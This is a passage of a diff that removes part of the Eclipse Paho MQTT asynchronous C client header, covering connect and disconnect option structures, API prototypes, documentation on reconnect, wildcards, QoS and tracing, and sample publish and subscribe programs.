-      * the <i>context</i> pointer is passed to success or failure callback functions to
-      * provide access to the context information in the callback.
-      */
-	void* context;
-	/**
-	  * The number of entries in the serverURIs array.
-	  */
-	int serverURIcount;
-	/**
-	  * An array of null-terminated strings specifying the servers to
-      * which the client will connect. Each string takes the form <i>protocol://host:port</i>.
-      * <i>protocol</i> must be <i>tcp</i> or <i>ssl</i>. For <i>host</i>, you can
-      * specify either an IP address or a domain name. For instance, to connect to
-      * a server running on the local machines with the default MQTT port, specify
-      * <i>tcp://localhost:1883</i>.
-      */
-	char* const* serverURIs;
-	/**
-      * Sets the version of MQTT to be used on the connect.
-      * MQTTVERSION_DEFAULT (0) = default: start with 3.1.1, and if that fails, fall back to 3.1
-      * MQTTVERSION_3_1 (3) = only try version 3.1
-      * MQTTVERSION_3_1_1 (4) = only try version 3.1.1
-	  */
-	int MQTTVersion;
-	/**
-	  * Reconnect automatically in the case of a connection being lost?
-	  */
-	int automaticReconnect;
-	/**
-	  * Minimum retry interval in seconds.  Doubled on each failed retry.
-	  */
-	int minRetryInterval;
-	/**
-	  * Maximum retry interval in seconds.  The doubling stops here on failed retries.
-	  */
-	int maxRetryInterval;
-	/**
-   * Optional binary password.  Only checked and used if the password option is NULL
-   */
-  struct {
-  	int len;            /**< binary password length */
-		const void* data;  /**< binary password data */
-	} binarypwd;
-} MQTTAsync_connectOptions;
-
-
-#define MQTTAsync_connectOptions_initializer { {'M', 'Q', 'T', 'C'}, 5, 60, 1, 10, NULL, NULL, NULL, 30, 0,\
-NULL, NULL, NULL, NULL, 0, NULL, 0, 0, 1, 60, {0, NULL}}
-
-/**
-  * This function attempts to connect a previously-created client (see
-  * MQTTAsync_create()) to an MQTT server using the specified options. If you
-  * want to enable asynchronous message and status notifications, you must call
-  * MQTTAsync_setCallbacks() prior to MQTTAsync_connect().
-  * @param handle A valid client handle from a successful call to
-  * MQTTAsync_create().
-  * @param options A pointer to a valid MQTTAsync_connectOptions
-  * structure.
-  * @return ::MQTTASYNC_SUCCESS if the client connect request was accepted.
-  * If the client was unable to connect to the server, an error code is
-  * returned via the onFailure callback, if set.
-  * Error codes greater than 0 are returned by the MQTT protocol:<br><br>
-  * <b>1</b>: Connection refused: Unacceptable protocol version<br>
-  * <b>2</b>: Connection refused: Identifier rejected<br>
-  * <b>3</b>: Connection refused: Server unavailable<br>
-  * <b>4</b>: Connection refused: Bad user name or password<br>
-  * <b>5</b>: Connection refused: Not authorized<br>
-  * <b>6-255</b>: Reserved for future use<br>
-  */
-DLLExport int MQTTAsync_connect(MQTTAsync handle, const MQTTAsync_connectOptions* options);
-
-
-typedef struct
-{
-	/** The eyecatcher for this structure. Must be MQTD. */
-	char struct_id[4];
-	/** The version number of this structure.  Must be 0 or 1.  0 signifies no SSL options */
-	int struct_version;
-	/**
-      * The client delays disconnection for up to this time (in
-      * milliseconds) in order to allow in-flight message transfers to complete.
-      */
-	int timeout;
-	/**
-    * A pointer to a callback function to be called if the disconnect successfully
-    * completes.  Can be set to NULL, in which case no indication of successful
-    * completion will be received.
-    */
-	MQTTAsync_onSuccess* onSuccess;
-	/**
-    * A pointer to a callback function to be called if the disconnect fails.
-    * Can be set to NULL, in which case no indication of unsuccessful
-    * completion will be received.
-    */
-	MQTTAsync_onFailure* onFailure;
-	/**
-	* A pointer to any application-specific context. The
-    * the <i>context</i> pointer is passed to success or failure callback functions to
-    * provide access to the context information in the callback.
-    */
-	void* context;
-} MQTTAsync_disconnectOptions;
-
-#define MQTTAsync_disconnectOptions_initializer { {'M', 'Q', 'T', 'D'}, 0, 0, NULL, NULL, NULL }
-
-
-/**
-  * This function attempts to disconnect the client from the MQTT
-  * server. In order to allow the client time to complete handling of messages
-  * that are in-flight when this function is called, a timeout period is
-  * specified. When the timeout period has expired, the client disconnects even
-  * if there are still outstanding message acknowledgements.
-  * The next time the client connects to the same server, any QoS 1 or 2
-  * messages which have not completed will be retried depending on the
-  * cleansession settings for both the previous and the new connection (see
-  * MQTTAsync_connectOptions.cleansession and MQTTAsync_connect()).
-  * @param handle A valid client handle from a successful call to
-  * MQTTAsync_create().
-  * @param options The client delays disconnection for up to this time (in
-  * milliseconds) in order to allow in-flight message transfers to complete.
-  * @return ::MQTTASYNC_SUCCESS if the client successfully disconnects from
-  * the server. An error code is returned if the client was unable to disconnect
-  * from the server
-  */
-DLLExport int MQTTAsync_disconnect(MQTTAsync handle, const MQTTAsync_disconnectOptions* options);
-
-
-/**
-  * This function allows the client application to test whether or not a
-  * client is currently connected to the MQTT server.
-  * @param handle A valid client handle from a successful call to
-  * MQTTAsync_create().
-  * @return Boolean true if the client is connected, otherwise false.
-  */
-DLLExport int MQTTAsync_isConnected(MQTTAsync handle);
-
-
-/**
-  * This function attempts to subscribe a client to a single topic, which may
-  * contain wildcards (see @ref wildcard). This call also specifies the
-  * @ref qos requested for the subscription
-  * (see also MQTTAsync_subscribeMany()).
-  * @param handle A valid client handle from a successful call to
-  * MQTTAsync_create().
-  * @param topic The subscription topic, which may include wildcards.
-  * @param qos The requested quality of service for the subscription.
-  * @param response A pointer to a response options structure. Used to set callback functions.
-  * @return ::MQTTASYNC_SUCCESS if the subscription request is successful.
-  * An error code is returned if there was a problem registering the
-  * subscription.
-  */
-DLLExport int MQTTAsync_subscribe(MQTTAsync handle, const char* topic, int qos, MQTTAsync_responseOptions* response);
-
-
-/**
-  * This function attempts to subscribe a client to a list of topics, which may
-  * contain wildcards (see @ref wildcard). This call also specifies the
-  * @ref qos requested for each topic (see also MQTTAsync_subscribe()).
-  * @param handle A valid client handle from a successful call to
-  * MQTTAsync_create().
-  * @param count The number of topics for which the client is requesting
-  * subscriptions.
-  * @param topic An array (of length <i>count</i>) of pointers to
-  * topics, each of which may include wildcards.
-  * @param qos An array (of length <i>count</i>) of @ref qos
-  * values. qos[n] is the requested QoS for topic[n].
-  * @param response A pointer to a response options structure. Used to set callback functions.
-  * @return ::MQTTASYNC_SUCCESS if the subscription request is successful.
-  * An error code is returned if there was a problem registering the
-  * subscriptions.
-  */
-DLLExport int MQTTAsync_subscribeMany(MQTTAsync handle, int count, char* const* topic, int* qos, MQTTAsync_responseOptions* response);
-
-/**
-  * This function attempts to remove an existing subscription made by the
-  * specified client.
-  * @param handle A valid client handle from a successful call to
-  * MQTTAsync_create().
-  * @param topic The topic for the subscription to be removed, which may
-  * include wildcards (see @ref wildcard).
-  * @param response A pointer to a response options structure. Used to set callback functions.
-  * @return ::MQTTASYNC_SUCCESS if the subscription is removed.
-  * An error code is returned if there was a problem removing the
-  * subscription.
-  */
-DLLExport int MQTTAsync_unsubscribe(MQTTAsync handle, const char* topic, MQTTAsync_responseOptions* response);
-
-/**
-  * This function attempts to remove existing subscriptions to a list of topics
-  * made by the specified client.
-  * @param handle A valid client handle from a successful call to
-  * MQTTAsync_create().
-  * @param count The number subscriptions to be removed.
-  * @param topic An array (of length <i>count</i>) of pointers to the topics of
-  * the subscriptions to be removed, each of which may include wildcards.
-  * @param response A pointer to a response options structure. Used to set callback functions.
-  * @return ::MQTTASYNC_SUCCESS if the subscriptions are removed.
-  * An error code is returned if there was a problem removing the subscriptions.
-  */
-DLLExport int MQTTAsync_unsubscribeMany(MQTTAsync handle, int count, char* const* topic, MQTTAsync_responseOptions* response);
-
-
-/**
-  * This function attempts to publish a message to a given topic (see also
-  * ::MQTTAsync_sendMessage()). An ::MQTTAsync_token is issued when
-  * this function returns successfully. If the client application needs to
-  * test for successful delivery of messages, a callback should be set
-  * (see ::MQTTAsync_onSuccess() and ::MQTTAsync_deliveryComplete()).
-  * @param handle A valid client handle from a successful call to
-  * MQTTAsync_create().
-  * @param destinationName The topic associated with this message.
-  * @param payloadlen The length of the payload in bytes.
-  * @param payload A pointer to the byte array payload of the message.
-  * @param qos The @ref qos of the message.
-  * @param retained The retained flag for the message.
-  * @param response A pointer to an ::MQTTAsync_responseOptions structure. Used to set callback functions.
-  * This is optional and can be set to NULL.
-  * @return ::MQTTASYNC_SUCCESS if the message is accepted for publication.
-  * An error code is returned if there was a problem accepting the message.
-  */
-DLLExport int MQTTAsync_send(MQTTAsync handle, const char* destinationName, int payloadlen, void* payload, int qos, int retained,
-																 MQTTAsync_responseOptions* response);
-
-
-/**
-  * This function attempts to publish a message to a given topic (see also
-  * MQTTAsync_publish()). An ::MQTTAsync_token is issued when
-  * this function returns successfully. If the client application needs to
-  * test for successful delivery of messages, a callback should be set
-  * (see ::MQTTAsync_onSuccess() and ::MQTTAsync_deliveryComplete()).
-  * @param handle A valid client handle from a successful call to
-  * MQTTAsync_create().
-  * @param destinationName The topic associated with this message.
-  * @param msg A pointer to a valid MQTTAsync_message structure containing
-  * the payload and attributes of the message to be published.
-  * @param response A pointer to an ::MQTTAsync_responseOptions structure. Used to set callback functions.
-  * @return ::MQTTASYNC_SUCCESS if the message is accepted for publication.
-  * An error code is returned if there was a problem accepting the message.
-  */
-DLLExport int MQTTAsync_sendMessage(MQTTAsync handle, const char* destinationName, const MQTTAsync_message* msg, MQTTAsync_responseOptions* response);
-
-
-/**
-  * This function sets a pointer to an array of tokens for
-  * messages that are currently in-flight (pending completion).
-  *
-  * <b>Important note:</b> The memory used to hold the array of tokens is
-  * malloc()'d in this function. The client application is responsible for
-  * freeing this memory when it is no longer required.
-  * @param handle A valid client handle from a successful call to
-  * MQTTAsync_create().
-  * @param tokens The address of a pointer to an ::MQTTAsync_token.
-  * When the function returns successfully, the pointer is set to point to an
-  * array of tokens representing messages pending completion. The last member of
-  * the array is set to -1 to indicate there are no more tokens. If no tokens
-  * are pending, the pointer is set to NULL.
-  * @return ::MQTTASYNC_SUCCESS if the function returns successfully.
-  * An error code is returned if there was a problem obtaining the list of
-  * pending tokens.
-  */
-DLLExport int MQTTAsync_getPendingTokens(MQTTAsync handle, MQTTAsync_token **tokens);
-
-/**
- * Tests whether a request corresponding to a token is complete.
- *
- * @param handle A valid client handle from a successful call to
- * MQTTAsync_create().
- * @param token An ::MQTTAsync_token associated with a request.
- * @return 1 if the request has been completed, 0 if not.
- */
-#define MQTTASYNC_TRUE 1
-DLLExport int MQTTAsync_isComplete(MQTTAsync handle, MQTTAsync_token token);
-
-
-/**
- * Waits for a request corresponding to a token to complete.
- *
- * @param handle A valid client handle from a successful call to
- * MQTTAsync_create().
- * @param token An ::MQTTAsync_token associated with a request.
- * @param timeout the maximum time to wait for completion, in milliseconds
- * @return ::MQTTASYNC_SUCCESS if the request has been completed in the time allocated,
- *  ::MQTTASYNC_FAILURE if not.
- */
-DLLExport int MQTTAsync_waitForCompletion(MQTTAsync handle, MQTTAsync_token token, unsigned long timeout);
-
-
-/**
-  * This function frees memory allocated to an MQTT message, including the
-  * additional memory allocated to the message payload. The client application
-  * calls this function when the message has been fully processed. <b>Important
-  * note:</b> This function does not free the memory allocated to a message
-  * topic string. It is the responsibility of the client application to free
-  * this memory using the MQTTAsync_free() library function.
-  * @param msg The address of a pointer to the ::MQTTAsync_message structure
-  * to be freed.
-  */
-DLLExport void MQTTAsync_freeMessage(MQTTAsync_message** msg);
-
-/**
-  * This function frees memory allocated by the MQTT C client library, especially the
-  * topic name. This is needed on Windows when the client libary and application
-  * program have been compiled with different versions of the C compiler.  It is
-  * thus good policy to always use this function when freeing any MQTT C client-
-  * allocated memory.
-  * @param ptr The pointer to the client library storage to be freed.
-  */
-DLLExport void MQTTAsync_free(void* ptr);
-
-/**
-  * This function frees the memory allocated to an MQTT client (see
-  * MQTTAsync_create()). It should be called when the client is no longer
-  * required.
-  * @param handle A pointer to the handle referring to the ::MQTTAsync
-  * structure to be freed.
-  */
-DLLExport void MQTTAsync_destroy(MQTTAsync* handle);
-
-
-
-enum MQTTASYNC_TRACE_LEVELS
-{
-	MQTTASYNC_TRACE_MAXIMUM = 1,
-	MQTTASYNC_TRACE_MEDIUM,
-	MQTTASYNC_TRACE_MINIMUM,
-	MQTTASYNC_TRACE_PROTOCOL,
-	MQTTASYNC_TRACE_ERROR,
-	MQTTASYNC_TRACE_SEVERE,
-	MQTTASYNC_TRACE_FATAL,
-};
-
-
-/**
-  * This function sets the level of trace information which will be
-  * returned in the trace callback.
-  * @param level the trace level required
-  */
-DLLExport void MQTTAsync_setTraceLevel(enum MQTTASYNC_TRACE_LEVELS level);
-
-
-/**
-  * This is a callback function prototype which must be implemented if you want
-  * to receive trace information.
-  * @param level the trace level of the message returned
-  * @param meesage the trace message.  This is a pointer to a static buffer which
-  * will be overwritten on each call.  You must copy the data if you want to keep
-  * it for later.
-  */
-typedef void MQTTAsync_traceCallback(enum MQTTASYNC_TRACE_LEVELS level, char* message);
-
-/**
-  * This function sets the trace callback if needed.  If set to NULL,
-  * no trace information will be returned.  The default trace level is
-  * MQTTASYNC_TRACE_MINIMUM.
-  * @param callback a pointer to the function which will handle the trace information
-  */
-DLLExport void MQTTAsync_setTraceCallback(MQTTAsync_traceCallback* callback);
-
-
-typedef struct
-{
-	const char* name;
-	const char* value;
-} MQTTAsync_nameValue;
-
-/**
-  * This function returns version information about the library.
-  * no trace information will be returned.  The default trace level is
-  * MQTTASYNC_TRACE_MINIMUM
-  * @return an array of strings describing the library.  The last entry is a NULL pointer.
-  */
-DLLExport MQTTAsync_nameValue* MQTTAsync_getVersionInfo(void);
-
-
-/**
-  * @cond MQTTAsync_main
-  * @page async Threading
-  * The client application runs on several threads.
-  * Processing of handshaking and maintaining
-  * the network connection is performed in the background.
-  * This API is thread safe: functions may be called by multiple application
-  * threads.
-  * Notifications of status and message reception are provided to the client
-  * application using callbacks registered with the library by the call to
-  * MQTTAsync_setCallbacks() (see MQTTAsync_messageArrived(),
-  * MQTTAsync_connectionLost() and MQTTAsync_deliveryComplete()).
-  * In addition, some functions allow success and failure callbacks to be set
-  * for individual requests, in the ::MQTTAsync_responseOptions structure.  Applications
-  * can be written as a chain of callback functions. Note that it is a theoretically
-  * possible but unlikely event, that a success or failure callback could be called
-  * before function requesting the callback has returned.  In this case the token
-  * delivered in the callback would not yet be known to the application program (see
-  * Race condition for MQTTAsync_token in MQTTAsync.c
-  * https://bugs.eclipse.org/bugs/show_bug.cgi?id=444093)
-  *
-  * @page auto_reconnect Automatic Reconnect
-  * The ability for the client library to reconnect automatically in the event
-  * of a connection failure was added in 1.1.  The connection lost callback
-  * allows a flexible response to the loss of a connection, so almost any
-  * behaviour can be implemented in that way.  Automatic reconnect does have the
-  * advantage of being a little simpler to use.
-  *
-  * To switch on automatic reconnect, the connect options field
-  * automaticReconnect should be set to non-zero.  The minimum and maximum times
-  * before the next connection attempt can also be set, the defaults being 1 and
-  * 60 seconds.  At each failure to reconnect, the retry interval is doubled until
-  * the maximum value is reached, and there it stays until the connection is
-  * successfully re-established whereupon it is reset.
-  *
-  * When a reconnection attempt is successful, the ::MQTTAsync_connected callback
-  * function is invoked, if set by calling ::MQTTAsync_setConnected.  This allows
-  * the application to take any actions needed, such as amending subscriptions.
-  *
-  * @page offline_publish Publish While Disconnected
-  * This feature was not originally available because with persistence enabled,
-  * messages could be stored locally without ever knowing if they could be sent.
-  * The client application could have created the client with an erroneous broker
-  * address or port for instance.
-  *
-  * To enable messages to be published when the application is disconnected
-  * ::MQTTAsync_createWithOptions must be used instead of ::MQTTAsync_create to
-  * create the client object.  The ::createOptions field sendWhileDisconnected
-  * must be set to non-zero, and the maxBufferedMessages field set as required -
-  * the default being 100.
-  *
-  * ::MQTTAsync_getPendingTokens can be called to return the ids of the messages
-  * waiting to be sent, or for which the sending process has not completed.
-  *
-  * @page wildcard Subscription wildcards
-  * Every MQTT message includes a topic that classifies it. MQTT servers use
-  * topics to determine which subscribers should receive messages published to
-  * the server.
-  *
-  * Consider the server receiving messages from several environmental sensors.
-  * Each sensor publishes its measurement data as a message with an associated
-  * topic. Subscribing applications need to know which sensor originally
-  * published each received message. A unique topic is thus used to identify
-  * each sensor and measurement type. Topics such as SENSOR1TEMP,
-  * SENSOR1HUMIDITY, SENSOR2TEMP and so on achieve this but are not very
-  * flexible. If additional sensors are added to the system at a later date,
-  * subscribing applications must be modified to receive them.
-  *
-  * To provide more flexibility, MQTT supports a hierarchical topic namespace.
-  * This allows application designers to organize topics to simplify their
-  * management. Levels in the hierarchy are delimited by the '/' character,
-  * such as SENSOR/1/HUMIDITY. Publishers and subscribers use these
-  * hierarchical topics as already described.
-  *
-  * For subscriptions, two wildcard characters are supported:
-  * <ul>
-  * <li>A '#' character represents a complete sub-tree of the hierarchy and
-  * thus must be the last character in a subscription topic string, such as
-  * SENSOR/#. This will match any topic starting with SENSOR/, such as
-  * SENSOR/1/TEMP and SENSOR/2/HUMIDITY.</li>
-  * <li> A '+' character represents a single level of the hierarchy and is
-  * used between delimiters. For example, SENSOR/+/TEMP will match
-  * SENSOR/1/TEMP and SENSOR/2/TEMP.</li>
-  * </ul>
-  * Publishers are not allowed to use the wildcard characters in their topic
-  * names.
-  *
-  * Deciding on your topic hierarchy is an important step in your system design.
-  *
-  * @page qos Quality of service
-  * The MQTT protocol provides three qualities of service for delivering
-  * messages between clients and servers: "at most once", "at least once" and
-  * "exactly once".
-  *
-  * Quality of service (QoS) is an attribute of an individual message being
-  * published. An application sets the QoS for a specific message by setting the
-  * MQTTAsync_message.qos field to the required value.
-  *
-  * A subscribing client can set the maximum quality of service a server uses
-  * to send messages that match the client subscriptions. The
-  * MQTTAsync_subscribe() and MQTTAsync_subscribeMany() functions set this
-  * maximum. The QoS of a message forwarded to a subscriber thus might be
-  * different to the QoS given to the message by the original publisher.
-  * The lower of the two values is used to forward a message.
-  *
-  * The three levels are:
-  *
-  * <b>QoS0, At most once:</b> The message is delivered at most once, or it
-  * may not be delivered at all. Its delivery across the network is not
-  * acknowledged. The message is not stored. The message could be lost if the
-  * client is disconnected, or if the server fails. QoS0 is the fastest mode of
-  * transfer. It is sometimes called "fire and forget".
-  *
-  * The MQTT protocol does not require servers to forward publications at QoS0
-  * to a client. If the client is disconnected at the time the server receives
-  * the publication, the publication might be discarded, depending on the
-  * server implementation.
-  *
-  * <b>QoS1, At least once:</b> The message is always delivered at least once.
-  * It might be delivered multiple times if there is a failure before an
-  * acknowledgment is received by the sender. The message must be stored
-  * locally at the sender, until the sender receives confirmation that the
-  * message has been published by the receiver. The message is stored in case
-  * the message must be sent again.
-  *
-  * <b>QoS2, Exactly once:</b> The message is always delivered exactly once.
-  * The message must be stored locally at the sender, until the sender receives
-  * confirmation that the message has been published by the receiver. The
-  * message is stored in case the message must be sent again. QoS2 is the
-  * safest, but slowest mode of transfer. A more sophisticated handshaking
-  * and acknowledgement sequence is used than for QoS1 to ensure no duplication
-  * of messages occurs.
-
-
-  * @page publish Publication example
-@code
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include "MQTTAsync.h"
-
-#define ADDRESS     "tcp://localhost:1883"
-#define CLIENTID    "ExampleClientPub"
-#define TOPIC       "MQTT Examples"
-#define PAYLOAD     "Hello World!"
-#define QOS         1
-#define TIMEOUT     10000L
-
-volatile MQTTAsync_token deliveredtoken;
-
-int finished = 0;
-
-void connlost(void *context, char *cause)
-{
-	MQTTAsync client = (MQTTAsync)context;
-	MQTTAsync_connectOptions conn_opts = MQTTAsync_connectOptions_initializer;
-	int rc;
-
-	printf("\nConnection lost\n");
-	printf("     cause: %s\n", cause);
-
-	printf("Reconnecting\n");
-	conn_opts.keepAliveInterval = 20;
-	conn_opts.cleansession = 1;
-	if ((rc = MQTTAsync_connect(client, &conn_opts)) != MQTTASYNC_SUCCESS)
-	{
-		printf("Failed to start connect, return code %d\n", rc);
- 		finished = 1;
-	}
-}
-
-
-void onDisconnect(void* context, MQTTAsync_successData* response)
-{
-	printf("Successful disconnection\n");
-	finished = 1;
-}
-
-
-void onSend(void* context, MQTTAsync_successData* response)
-{
-	MQTTAsync client = (MQTTAsync)context;
-	MQTTAsync_disconnectOptions opts = MQTTAsync_disconnectOptions_initializer;
-	int rc;
-
-	printf("Message with token value %d delivery confirmed\n", response->token);
-
-	opts.onSuccess = onDisconnect;
-	opts.context = client;
-
-	if ((rc = MQTTAsync_disconnect(client, &opts)) != MQTTASYNC_SUCCESS)
-	{
-		printf("Failed to start sendMessage, return code %d\n", rc);
-		exit(EXIT_FAILURE);
-	}
-}
-
-
-void onConnectFailure(void* context, MQTTAsync_failureData* response)
-{
-	printf("Connect failed, rc %d\n", response ? response->code : 0);
-	finished = 1;
-}
-
-
-void onConnect(void* context, MQTTAsync_successData* response)
-{
-	MQTTAsync client = (MQTTAsync)context;
-	MQTTAsync_responseOptions opts = MQTTAsync_responseOptions_initializer;
-	MQTTAsync_message pubmsg = MQTTAsync_message_initializer;
-	int rc;
-
-	printf("Successful connection\n");
-
-	opts.onSuccess = onSend;
-	opts.context = client;
-
-	pubmsg.payload = PAYLOAD;
-	pubmsg.payloadlen = strlen(PAYLOAD);
-	pubmsg.qos = QOS;
-	pubmsg.retained = 0;
-	deliveredtoken = 0;
-
-	if ((rc = MQTTAsync_sendMessage(client, TOPIC, &pubmsg, &opts)) != MQTTASYNC_SUCCESS)
-	{
-		printf("Failed to start sendMessage, return code %d\n", rc);
-		exit(EXIT_FAILURE);
-	}
-}
-
-
-int main(int argc, char* argv[])
-{
-	MQTTAsync client;
-	MQTTAsync_connectOptions conn_opts = MQTTAsync_connectOptions_initializer;
-	MQTTAsync_message pubmsg = MQTTAsync_message_initializer;
-	MQTTAsync_token token;
-	int rc;
-
-	MQTTAsync_create(&client, ADDRESS, CLIENTID, MQTTCLIENT_PERSISTENCE_NONE, NULL);
-
-	MQTTAsync_setCallbacks(client, NULL, connlost, NULL, NULL);
-
-	conn_opts.keepAliveInterval = 20;
-	conn_opts.cleansession = 1;
-	conn_opts.onSuccess = onConnect;
-	conn_opts.onFailure = onConnectFailure;
-	conn_opts.context = client;
-	if ((rc = MQTTAsync_connect(client, &conn_opts)) != MQTTASYNC_SUCCESS)
-	{
-		printf("Failed to start connect, return code %d\n", rc);
-		exit(EXIT_FAILURE);
-	}
-
-	printf("Waiting for publication of %s\n"
-         "on topic %s for client with ClientID: %s\n",
-         PAYLOAD, TOPIC, CLIENTID);
-	while (!finished)
-		#if defined(WIN32) || defined(WIN64)
-			Sleep(100);
-		#else
-			usleep(10000L);
-		#endif
-
-	MQTTAsync_destroy(&client);
- 	return rc;
-}
-
-  * @endcode
-  * @page subscribe Subscription example
-@code
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include "MQTTAsync.h"
-
-#define ADDRESS     "tcp://localhost:1883"
-#define CLIENTID    "ExampleClientSub"
-#define TOPIC       "MQTT Examples"
-#define PAYLOAD     "Hello World!"
-#define QOS         1
-#define TIMEOUT     10000L
-
-volatile MQTTAsync_token deliveredtoken;
-
-int disc_finished = 0;
-int subscribed = 0;
-int finished = 0;
-
-void connlost(void *context, char *cause)
-{
-	MQTTAsync client = (MQTTAsync)context;
-	MQTTAsync_connectOptions conn_opts = MQTTAsync_connectOptions_initializer;
-	int rc;
-
-	printf("\nConnection lost\n");
-	printf("     cause: %s\n", cause);
-
-	printf("Reconnecting\n");
-	conn_opts.keepAliveInterval = 20;
-	conn_opts.cleansession = 1;
-	if ((rc = MQTTAsync_connect(client, &conn_opts)) != MQTTASYNC_SUCCESS)
-	{
-		printf("Failed to start connect, return code %d\n", rc);
-	    finished = 1;
-	}
-}
-
-
-int msgarrvd(void *context, char *topicName, int topicLen, MQTTAsync_message *message)
-{
-    int i;
-    char* payloadptr;
-
-    printf("Message arrived\n");
-    printf("     topic: %s\n", topicName);
-    printf("   message: ");
-
-    payloadptr = message->payload;
-    for(i=0; i<message->payloadlen; i++)
-    {
-        putchar(*payloadptr++);
-    }
-    putchar('\n');
-    MQTTAsync_freeMessage(&message);
-    MQTTAsync_free(topicName);
-    return 1;
-}
-
-
-void onDisconnect(void* context, MQTTAsync_successData* response)
-{
-	printf("Successful disconnection\n");
-	disc_finished = 1;
-}
-
-
-void onSubscribe(void* context, MQTTAsync_successData* response)
-{
-	printf("Subscribe succeeded\n");
-	subscribed = 1;
-}
-
-void onSubscribeFailure(void* context, MQTTAsync_failureData* response)
-{
-	printf("Subscribe failed, rc %d\n", response ? response->code : 0);
-	finished = 1;
-}
-
-
-void onConnectFailure(void* context, MQTTAsync_failureData* response)
-{
-	printf("Connect failed, rc %d\n", response ? response->code : 0);
-	finished = 1;
-}
-
-
-void onConnect(void* context, MQTTAsync_successData* response)
-{
-	MQTTAsync client = (MQTTAsync)context;
-	MQTTAsync_responseOptions opts = MQTTAsync_responseOptions_initializer;
-	MQTTAsync_message pubmsg = MQTTAsync_message_initializer;
-	int rc;
-
-	printf("Successful connection\n");
-
-	printf("Subscribing to topic %s\nfor client %s using QoS%d\n\n"
-           "Press Q<Enter> to quit\n\n", TOPIC, CLIENTID, QOS);
-	opts.onSuccess = onSubscribe;
-	opts.onFailure = onSubscribeFailure;
-	opts.context = client;
-
-	deliveredtoken = 0;
-
-	if ((rc = MQTTAsync_subscribe(client, TOPIC, QOS, &opts)) != MQTTASYNC_SUCCESS)
-	{
-		printf("Failed to start subscribe, return code %d\n", rc);
-		exit(EXIT_FAILURE);
-	}
-}
-
-
-int main(int argc, char* argv[])
-{
-	MQTTAsync client;
-	MQTTAsync_connectOptions conn_opts = MQTTAsync_connectOptions_initializer;
-	MQTTAsync_disconnectOptions disc_opts = MQTTAsync_disconnectOptions_initializer;
-	MQTTAsync_message pubmsg = MQTTAsync_message_initializer;
-	MQTTAsync_token token;
-	int rc;
-	int ch;
-
-	MQTTAsync_create(&client, ADDRESS, CLIENTID, MQTTCLIENT_PERSISTENCE_NONE, NULL);
-
-	MQTTAsync_setCallbacks(client, NULL, connlost, msgarrvd, NULL);
-
-	conn_opts.keepAliveInterval = 20;
-	conn_opts.cleansession = 1;
-	conn_opts.onSuccess = onConnect;
-	conn_opts.onFailure = onConnectFailure;
-	conn_opts.context = client;
-	if ((rc = MQTTAsync_connect(client, &conn_opts)) != MQTTASYNC_SUCCESS)
-	{
-		printf("Failed to start connect, return code %d\n", rc);
-		exit(EXIT_FAILURE);
-	}
-
-	while	(!subscribed)
-		#if defined(WIN32) || defined(WIN64)
-			Sleep(100);
-		#else
-			usleep(10000L);
-		#endif
-
-	if (finished)
-		goto exit;
-
-	do
-	{
-		ch = getchar();
-	} while (ch!='Q' && ch != 'q');
-
-	disc_opts.onSuccess = onDisconnect;
-	if ((rc = MQTTAsync_disconnect(client, &disc_opts)) != MQTTASYNC_SUCCESS)
-	{
-		printf("Failed to start disconnect, return code %d\n", rc);
-		exit(EXIT_FAILURE);
-	}
- 	while	(!disc_finished)
-		#if defined(WIN32) || defined(WIN64)
-			Sleep(100);
-		#else
-			usleep(10000L);
-		#endif
-
-exit:
-	MQTTAsync_destroy(&client);
- 	return rc;
-}
-
-  * @endcode
-* @page tracing Tracing
-  *
-  * Runtime tracing can be controlled by environment variables or API calls.
-  *
-  * #### Environment variables
-  *
-  * Tracing is switched on by setting the MQTT_C_CLIENT_TRACE environment variable.
-  * A value of ON, or stdout, prints to stdout, any other value is interpreted as a file name to use.
-  *
-  * The amount of trace detail is controlled with the MQTT_C_CLIENT_TRACE_LEVEL environment
-  * variable - valid values are ERROR, PROTOCOL, MINIMUM, MEDIUM and MAXIMUM
-  * (from least to most verbose).
-  *
-  * The variable MQTT_C_CLIENT_TRACE_MAX_LINES limits the number of lines of trace that are output
-  * to a file.  Two files are used at most, when they are full, the last one is overwritten with the
-  * new trace entries.  The default size is 1000 lines.
-  *
-  * #### Trace API calls
-  *
-  * MQTTAsync_traceCallback() is used to set a callback function which is called whenever trace
-  * information is available.  This will be the same information as that printed if the
-  * environment variables were used to control the trace.
-  *
-  * The MQTTAsync_setTraceLevel() calls is used to set the maximum level of trace entries that will be
-  * passed to the callback function.  The levels are:
-  * 1. ::MQTTASYNC_TRACE_MAXIMUM
-  * 2. ::MQTTASYNC_TRACE_MEDIUM
-  * 3. ::MQTTASYNC_TRACE_MINIMUM
-  * 4. ::MQTTASYNC_TRACE_PROTOCOL
-  * 5. ::MQTTASYNC_TRACE_ERROR
-  * 6. ::MQTTASYNC_TRACE_SEVERE
-  * 7. ::MQTTASYNC_TRACE_FATAL
-  *
-  * Selecting ::MQTTASYNC_TRACE_MAXIMUM will cause all trace entries at all levels to be returned.
-  * Choosing ::MQTTASYNC_TRACE_ERROR will cause ERROR, SEVERE and FATAL trace entries to be returned
-  * to the callback function.
-  *
-  * ### MQTT Packet Tracing
-  *
-  * A feature that can be very useful is printing the MQTT packets that are sent and received.  To
-  * achieve this, use the following environment variable settings:
-  * @code
-    MQTT_C_CLIENT_TRACE=ON
-    MQTT_C_CLIENT_TRACE_LEVEL=PROTOCOL
-  * @endcode
-  * The output you should see looks like this:
-  * @code
-    20130528 155936.813 3 stdout-subscriber -> CONNECT cleansession: 1 (0)
-    20130528 155936.813 3 stdout-subscriber <- CONNACK rc: 0
-    20130528 155936.813 3 stdout-subscriber -> SUBSCRIBE msgid: 1 (0)
-    20130528 155936.813 3 stdout-subscriber <- SUBACK msgid: 1
-    20130528 155941.818 3 stdout-subscriber -> DISCONNECT (0)
-  * @endcode
-  * where the fields are:
-  * 1. date
-  * 2. time
-  * 3. socket number
-  * 4. client id
-  * 5. direction (-> from client to server, <- from server to client)
-  * 6. packet details
-  *
-  * ### Default Level Tracing
-  *
-  * This is an extract of a default level trace of a call to connect:
-  * @code
-    19700101 010000.000 (1152206656) (0)> MQTTClient_connect:893
-    19700101 010000.000 (1152206656)  (1)> MQTTClient_connectURI:716
-    20130528 160447.479 Connecting to serverURI localhost:1883
-    20130528 160447.479 (1152206656)   (2)> MQTTProtocol_connect:98
-    20130528 160447.479 (1152206656)    (3)> MQTTProtocol_addressPort:48
-    20130528 160447.479 (1152206656)    (3)< MQTTProtocol_addressPort:73
